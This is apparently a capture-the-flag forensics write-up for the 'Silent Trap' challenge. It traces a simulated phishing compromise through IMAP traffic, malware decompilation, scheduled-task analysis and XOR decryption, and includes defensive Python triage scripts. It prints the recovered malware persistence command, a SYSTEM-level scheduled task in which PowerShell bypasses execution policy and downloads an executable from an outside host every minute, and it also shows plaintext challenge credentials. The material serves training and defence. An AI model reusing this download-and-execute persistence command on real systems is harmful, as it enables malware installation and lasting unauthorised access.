2025 Cyber Apocalypse: Silent Trap

Challenge Information

Attribute   Details
Event       2025 Cyber Apocalypse
Category    Forensics
Challenge   Silent Trap

Summary

Silent Trap is a comprehensive forensics challenge that simulates a targeted attack against a game development studio in the fictional world of Eldoria. Thousands of players are trapped in the virtual world after attackers compromised developers’ and system administrators’ computers. Through network packet analysis and system artifact examination, investigators must uncover the attack chain, identify malware, extract credentials, and reveal the attacker’s objectives.


Analysis

Incident Timeline

Attack Chain:

  1. Attacker sends phishing email to developer
  2. Developer opens attachment (Eldoria_Balance_Issue_Report.zip)
  3. Malware extracted and executed
  4. System compromised and attacker gains persistence
  5. Attacker schedules tasks and conducts reconnaissance
  6. Additional tools deployed from external source

Evidence Collected

Questions to Answer:

  1. What is the subject of the first email opened by the victim? Game Crash on Level 5
  2. When was the suspicious email sent? 2025-02-24_15:46
  3. MD5 hash of malware file? c0b37994963cc0aadd6e78a256c51547
  4. Attacker’s email credentials? proplayer@email.com:completed
  5. Scheduled task name? Synchronization
  6. Leaked API key? sk-3498fwe09r8fw3f98fw9832fw

Solution

Step 1: IMAP Traffic Analysis

Examine email communication to identify the attack vector:

# Filter IMAP traffic from network capture
tshark -r capture.pcapng -Y "imap" -T fields -e imap.request

Key Findings:

  • Attacker logged in as proplayer@email.com with password completed
  • Subject: “Game Crash on Level 5” (First email opened/replied to)
  • Sent: 2025-02-24_15:46
  • Contains malicious attachment: Eldoria_Balance_Issue_Report.zip

Step 2: Malware Analysis

Extract and analyze the malware file:

File: Eldoria_Balance_Issue_Report.pdf.exe

# Get file hash
md5sum Eldoria_Balance_Issue_Report.pdf.exe
# Output: c0b37994963cc0aadd6e78a256c51547
# Binary metadata (format, architecture, .NET/CLR flags); -z lists the strings
rabin2 -I Eldoria_Balance_Issue_Report.pdf.exe
rabin2 -z Eldoria_Balance_Issue_Report.pdf.exe
# Decompile the .NET assembly with ILSpy's command-line front end
ilspycmd -o DecompiledSource Eldoria_Balance_Issue_Report.pdf.exe

Malware Behavior:

  • Executed arbitrary PowerShell commands
  • Created persistence mechanisms
  • Scheduled tasks for command execution
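A point worth making about Step 2: plain `strings`-style ASCII extraction misses the UTF-16LE literals that .NET assemblies keep in their user-string heap, which is why a tool such as rabin2 (or the decompiler) sees the schtasks and PowerShell command lines at all. The following is an added Python triage helper, not code from the writeup: it hashes a sample, extracts both ASCII and UTF-16LE strings, and flags the indicators discussed above. The byte blob is constructed to look like a .NET PE and contains made-up strings; the indicator table is an assumption for this example.

```python
import hashlib
import re

# Constructed byte blob shaped like a .NET PE: a DOS stub, two UTF-16LE literals of the kind
# the #US string heap holds, and the CLR entry-point import names. Not the challenge binary.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"This program cannot be run in DOS mode.\r\n"
    + "schtasks /create /tn Synchronization /sc minute /mo 1 /ru SYSTEM".encode("utf-16-le")
    + b"\x00" * 8
    + "powershell.exe -ExecutionPolicy Bypass".encode("utf-16-le")
    + b"\x00" * 8
    + b"mscoree.dll\x00_CorExeMain\x00"
)

# Substrings worth a closer look (assumed indicator list, derived from the behaviour above)
INDICATORS = {
    "schtasks": "scheduled task creation",
    "powershell": "PowerShell invocation",
    "-executionpolicy bypass": "execution policy bypass",
    "invoke-webrequest": "download cradle",
    "http": "URL",
    "_corexemain": ".NET assembly (decompile with ilspycmd)",
}


def file_hashes(data: bytes) -> dict:
    """MD5/SHA-1/SHA-256 of the sample, for lookups and the challenge answer."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """ASCII strings (what `strings` reports) plus UTF-16LE strings (what it misses)."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    ascii_strings = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    wide_strings = [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return ascii_strings + wide_strings


def flag_indicators(strings: list) -> list:
    """Pair each extracted string with the indicator it matched (case-insensitive)."""
    hits = []
    for s in strings:
        for needle, why in INDICATORS.items():
            if needle in s.lower():
                hits.append((s, why))
    return hits


if __name__ == "__main__":
    for name, digest in file_hashes(SAMPLE_BINARY).items():
        print(f"{name}: {digest}")
    for s, why in flag_indicators(extract_strings(SAMPLE_BINARY)):
        print(f"[{why}] {s}")
```

Run against the real sample by reading the file into `SAMPLE_BINARY`; the UTF-16LE pass is the one that surfaces the scheduled-task and PowerShell strings from a .NET binary.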

Step 3: Credential Extraction

From network traffic and memory artifacts:

# Wireshark display filter: follow the attacker's IMAP session
tcp.stream eq 13
# IMAP LOGIN command observed in that stream (username, then password)
LOGIN proplayer@email.com completed

Extracted Credentials:

  • Email: proplayer@email.com
  • Password: completed
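To make Steps 1 and 3 reproducible without clicking through Wireshark, here is a small parser for an IMAP session transcript that pulls out LOGIN credentials and the From/Subject/Date headers of fetched messages. This is an added example, not code from the writeup; the transcript below is constructed in the style of a "Follow TCP Stream" export (the `C:`/`S:` prefixes mark client and server lines, and the tags, sender address and literal size are made up), with only the login and the subject/time matching the findings above.

```python
import re
from email.utils import parsedate_to_datetime

# Constructed IMAP session transcript. "C:" marks client lines and "S:" server lines; the
# tags, the sender address and the literal size are made up. Only the login and the
# Subject/Date headers mirror the writeup's findings.
SAMPLE_STREAM = """\
S: * OK IMAP4rev1 Service Ready
C: a1 LOGIN proplayer@email.com completed
S: a1 OK LOGIN completed
C: a2 SELECT INBOX
S: a2 OK [READ-WRITE] SELECT completed
C: a3 FETCH 1 (BODY[HEADER.FIELDS (FROM SUBJECT DATE)])
S: * 1 FETCH (BODY[HEADER.FIELDS (FROM SUBJECT DATE)] {104}
S: From: Dev Lead <devlead@example.test>
S: Subject: Game Crash on Level 5
S: Date: Mon, 24 Feb 2025 15:46:00 +0000
S:
S: )
S: a3 OK FETCH completed
C: a4 LOGOUT
"""

LOGIN_RE = re.compile(r'^C: \S+ LOGIN (\S+) (\S+)$')
HEADER_RE = re.compile(r'^S: (From|Subject|Date): (.*)$')


def parse_imap_session(stream: str) -> dict:
    """Extract LOGIN credentials and per-message headers from an IMAP transcript."""
    logins, messages, current = [], [], None
    for line in stream.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            # IMAP allows quoted strings for these arguments; strip the quotes if present
            logins.append((m.group(1).strip('"'), m.group(2).strip('"')))
            continue
        if line.startswith("S: *") and " FETCH (" in line:
            current = {}            # an untagged FETCH response starts a new message
            messages.append(current)
            continue
        h = HEADER_RE.match(line)
        if h and current is not None:
            current[h.group(1).lower()] = h.group(2).strip()
    for msg in messages:
        if "date" in msg:
            # normalise to the YYYY-MM-DD_HH:MM form used in the challenge answers
            msg["sent"] = parsedate_to_datetime(msg["date"]).strftime("%Y-%m-%d_%H:%M")
    return {"logins": logins, "messages": messages}


if __name__ == "__main__":
    result = parse_imap_session(SAMPLE_STREAM)
    for user, password in result["logins"]:
        print(f"LOGIN {user} / {password}")
    for msg in result["messages"]:
        print(f"{msg.get('sent')}  {msg.get('subject')}  (from {msg.get('from')})")
```

Because IMAP LOGIN sends the password in the clear, any capture of an unencrypted IMAP session exposes it exactly as this parser shows; that is the same weakness the attacker's own session suffered from in the capture.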

Step 4: Task Scheduler Analysis

Analyze scheduled tasks created by attacker:

# Scheduled task for command execution (as recovered from the malware)
schtasks /create /tn Synchronization ^
  /tr "powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri https://www.mediafire.com/view/wlq9mlfrl0nlcuk/rakalam.exe/file -OutFile C:\Temp\rakalam.exe" ^
  /sc minute /mo 1 /ru SYSTEM

Task Details:

  • Name: Synchronization
  • Purpose: Download additional malware every minute
  • Privilege: SYSTEM
  • Source: MediaFire (external)
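The task above is a textbook persistence entry. As an added triage example (not from the writeup), the following scores scheduled tasks exported with `schtasks /query /fo CSV /v` against the traits that made Synchronization stand out: a PowerShell download cradle with an execution-policy bypass, a remote URL, a user-writable drop path, SYSTEM privileges and a one-minute repeat. The CSV below is constructed and trimmed to a few of the verbose columns; the first row mirrors the recovered task and the second is a made-up benign task for contrast. The rule list is an assumption for this example, not a vendor signature set.

```python
import csv
import io
import re

# Constructed sample in the shape of `schtasks /query /fo CSV /v` output, trimmed to a few of
# its verbose columns. Row 1 mirrors the task recovered in the writeup; row 2 is a made-up
# benign task for contrast.
SAMPLE_CSV = r'''"TaskName","Task To Run","Schedule Type","Repeat: Every","Run As User"
"\Synchronization","powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri https://www.mediafire.com/view/wlq9mlfrl0nlcuk/rakalam.exe/file -OutFile C:\Temp\rakalam.exe","Minute","0:01:00","SYSTEM"
"\Backup\NightlyBackup","C:\Program Files\Backup\backup.exe --full","Daily","N/A","CORP\svc-backup"
'''

# Traits of the command line that, together, made Synchronization stand out (assumed rules)
COMMAND_RULES = [
    (r"-ExecutionPolicy\s+Bypass", "execution policy bypass"),
    (r"-(?:EncodedCommand|enc)\b", "encoded PowerShell command"),
    (r"Invoke-WebRequest|DownloadString|DownloadFile|certutil|curl\.exe", "download cradle"),
    (r"https?://", "remote URL in command"),
    (r"\\(?:Temp|Users\\Public|AppData)\\", "user-writable drop path"),
]
URL_RE = re.compile(r"https?://\S+")


def interval_seconds(repeat: str):
    """Convert the 'Repeat: Every' H:MM:SS value to seconds; None if the task does not repeat."""
    m = re.fullmatch(r"(\d+):(\d{2}):(\d{2})", repeat.strip())
    if not m:
        return None
    h, mi, s = (int(x) for x in m.groups())
    return h * 3600 + mi * 60 + s


def triage_tasks(csv_text: str) -> list:
    """Score each task by how many persistence/download traits it shows; highest first."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = row.get("Task To Run", "")
        reasons = [why for pattern, why in COMMAND_RULES if re.search(pattern, cmd, re.IGNORECASE)]
        if row.get("Run As User", "").upper() in ("SYSTEM", "NT AUTHORITY\\SYSTEM"):
            reasons.append("runs as SYSTEM")
        secs = interval_seconds(row.get("Repeat: Every", ""))
        if secs is not None and secs <= 300:
            reasons.append(f"repeats every {secs}s")
        if reasons:
            findings.append({"task": row["TaskName"], "score": len(reasons),
                             "reasons": reasons, "urls": URL_RE.findall(cmd)})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for f in triage_tasks(SAMPLE_CSV):
        print(f"{f['task']}: score {f['score']} -> {', '.join(f['reasons'])}")
        for url in f["urls"]:
            print(f"  downloads from {url}")
```

The extracted URL doubles as an indicator to block at the proxy; the same checks map directly onto Task Scheduler event logs (task registered, task launched) if you would rather alert at creation time than sweep afterwards.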

Step 5: File System Analysis

Examine compromised system files:

# Credentials file located in backups
more C:\backups\credentials.txt
# Output:
[Database Server]
host=db.internal.korptech.net
username=dbadmin
password=rY?ZY_65P4V0
[Game API]
host=api.korptech.net
api_key=sk-3498fwe09r8fw3f98fw9832fw
[SSH Access]
host=dev-build.korptech.net
username=devops
password=BuildServer@92|7Gy1lz'Xb
port=2022

Step 6: Decryption of Encrypted Commands

Some attacker commands were XOR-encrypted in the network traffic:

import base64

# XOR key identified from network analysis (256 bytes, applied as a repeating key)
xor_key = bytes.fromhex(
    "A8 73 AE D5 A8 DE 48 24 5B D1 F2 80 45 63 C3 A4 EE B6 43 5C "
    "07 79 A4 56 79 0A 5D 04 8C 6F F8 2C 1E 5E 30 36 2D 64 B8 36 "
    "1C 52 C9 BC CB 96 7B A3 E5 8A B1 33 A4 E8 56 9A B3 8F 90 16 "
    "86 0C 28 F3 37 02 49 67 63 F3 EC 77 09 78 F7 19 84 89 43 42 "
    "6F F0 6C 56 55 3F 2C 31 F1 06 03 AA 83 96 35 31 7E 48 3C 24 "
    "90 F8 37 0A F1 D0 A3 D9 31 9A CE E3 19 63 12 90 86 A9 ED 64 "
    "75 16 0B 96 9D E6 AD 26 48 63 81 1E DC 70 E2 38 10 72 85 16 "
    "60 01 5A 48 A2 26 8F BA 23 8E 80 EA C4 EF 86 B2 CD E5 79 E1 "
    "F6 E8 CD EC FE 98 91 62 7E 1D D9 4A B1 8E 13 BE B6 97 E9 9D "
    "4C 4A 68 9B 4F 73 05 12 CC 41 FE CC 76 47 5C 21 3A 70 CE 97 "
    "67 B3 18 A4 DB 62 51 06 F1 64 E4 BE 60 8C 80 01 A1 F6 EC 19 "
    "3E 64 57 91 B9 2D 3D 8F 34 08 E3 20 E9 25 B7 65 59 18 7D CB "
    "E3 09 92 9C D0 CE C2 86 C2 17 E9 64 26 9E 3A 9F"
)
# The captured payload is base64 text, not hex, so decode it with b64decode before the XOR
# (the blob is truncated here; paste the full string from the capture)
encrypted = base64.b64decode("dG6eWp6GbD/UmoUXLWq2NQ/hE4n5vgwcJtKvpqDisLc...")
# Decrypt: XOR each byte with the key byte at the same position, wrapping around the key
decrypted = bytes(e ^ xor_key[i % len(xor_key)] for i, e in enumerate(encrypted))
print(decrypted.decode("utf-8", errors="replace"))
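The snippet above assumes the 256-byte key is already known. The takeaway below that repeating-key XOR "can be broken with key recovery" deserves a worked demonstration: with a plaintext guess at least twice the key length (command output usually starts with a predictable banner), the period can be found and the whole key read off the ciphertext. This is an added example, not the challenge's code: `encode_like_malware` is a stand-in that mimics the XOR-then-base64 shape seen in the capture, and the key, the fake command output and the known prefix are all constructed.

```python
import base64
from itertools import cycle
from typing import Optional


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (the same operation encrypts and decrypts)."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def encode_like_malware(plaintext: bytes, key: bytes) -> str:
    """Constructed stand-in for the malware's encoding: repeating-key XOR, then base64."""
    return base64.b64encode(xor_bytes(plaintext, key)).decode()


def guess_key_length(ciphertext: bytes, known_plaintext: bytes, max_len: int = 512) -> Optional[int]:
    """Find the key period from a known-plaintext prefix.

    XORing ciphertext with the true plaintext exposes the keystream; the key length is the
    smallest shift under which that keystream repeats. At least two periods of known
    plaintext are needed to confirm a candidate, otherwise None is returned.
    """
    n = min(len(ciphertext), len(known_plaintext))
    keystream = xor_bytes(ciphertext[:n], known_plaintext[:n])
    for length in range(1, max_len + 1):
        if 2 * length > n:
            return None
        if keystream[length:] == keystream[:-length]:
            return length
    return None


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_len: int) -> Optional[bytes]:
    """Read the full key off the first key_len bytes of known plaintext."""
    if min(len(ciphertext), len(known_plaintext)) < key_len:
        return None
    return xor_bytes(ciphertext[:key_len], known_plaintext[:key_len])


def decode_capture(b64_blob: str, key: bytes) -> str:
    """Decode one captured blob: base64, then XOR with the recovered key."""
    return xor_bytes(base64.b64decode(b64_blob), key).decode("utf-8", errors="replace")


# Constructed demo data: a 16-byte key and a fake command output whose first 44 bytes are
# the kind of banner an analyst could guess (ipconfig-style output).
DEMO_KEY = bytes(range(0xA0, 0xB0))
DEMO_OUTPUT = (b"Windows IP Configuration\r\n\r\nEthernet adapter Ethernet:\r\n"
               b"   IPv4 Address. . . : 10.0.0.5\r\n")
DEMO_BLOB = encode_like_malware(DEMO_OUTPUT, DEMO_KEY)
DEMO_KNOWN_PREFIX = b"Windows IP Configuration\r\n\r\nEthernet adapter"


def break_demo() -> dict:
    """Recover the key from the blob and the guessed prefix, then decode the blob."""
    ciphertext = base64.b64decode(DEMO_BLOB)
    key_len = guess_key_length(ciphertext, DEMO_KNOWN_PREFIX)
    key = recover_key(ciphertext, DEMO_KNOWN_PREFIX, key_len) if key_len else None
    return {"key_len": key_len, "key": key,
            "plaintext": decode_capture(DEMO_BLOB, key) if key else None}


if __name__ == "__main__":
    r = break_demo()
    print(f"key length {r['key_len']}, key {r['key'].hex()}")
    print(r["plaintext"])
```

For the challenge's 256-byte key the same approach needs at least 512 bytes of predictable output in one message; when the guessable banner is shorter than that, the key recovered from one blob is partial, and the remaining bytes have to come from a second message or, as in the writeup, from the binary itself.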

Key Findings Summary

Finding               Details
Attack Vector         Phishing email with malware attachment
First Email Subject   Game Crash on Level 5
Email Timestamp       2025-02-24 15:46
Malware Hash          c0b37994963cc0aadd6e78a256c51547
Attacker Email        proplayer@email.com:completed
Scheduled Task        Synchronization (downloads rakalam.exe)
Leaked API Key        sk-3498fwe09r8fw3f98fw9832fw
Compromise Scope      Database, API, and SSH credentials exposed

Key Takeaways

  • IMAP Analysis: Email protocols in captured traffic reveal attack vectors
  • Malware Attribution: File hashes and behavior analysis identify malware
  • Credential Theft: Attackers frequently target stored credentials on compromised systems
  • Persistence Mechanisms: Task scheduler abuse enables sustained access
  • Encryption Analysis: XOR encryption in attacker communications can be broken with key recovery
  • Credential Management: Never store credentials in plaintext files, even in backups
  • Defense Layering: Multiple systems were compromised due to shared credentials

Tools Used

  • Wireshark/tshark: Network packet analysis and IMAP protocol examination
  • Volatility: Memory forensics and artifact extraction
  • Strings/radare2: Malware analysis and binary examination
  • Python: Custom decryption and analysis scripts
  • CyberChef: Data format conversion and decoding
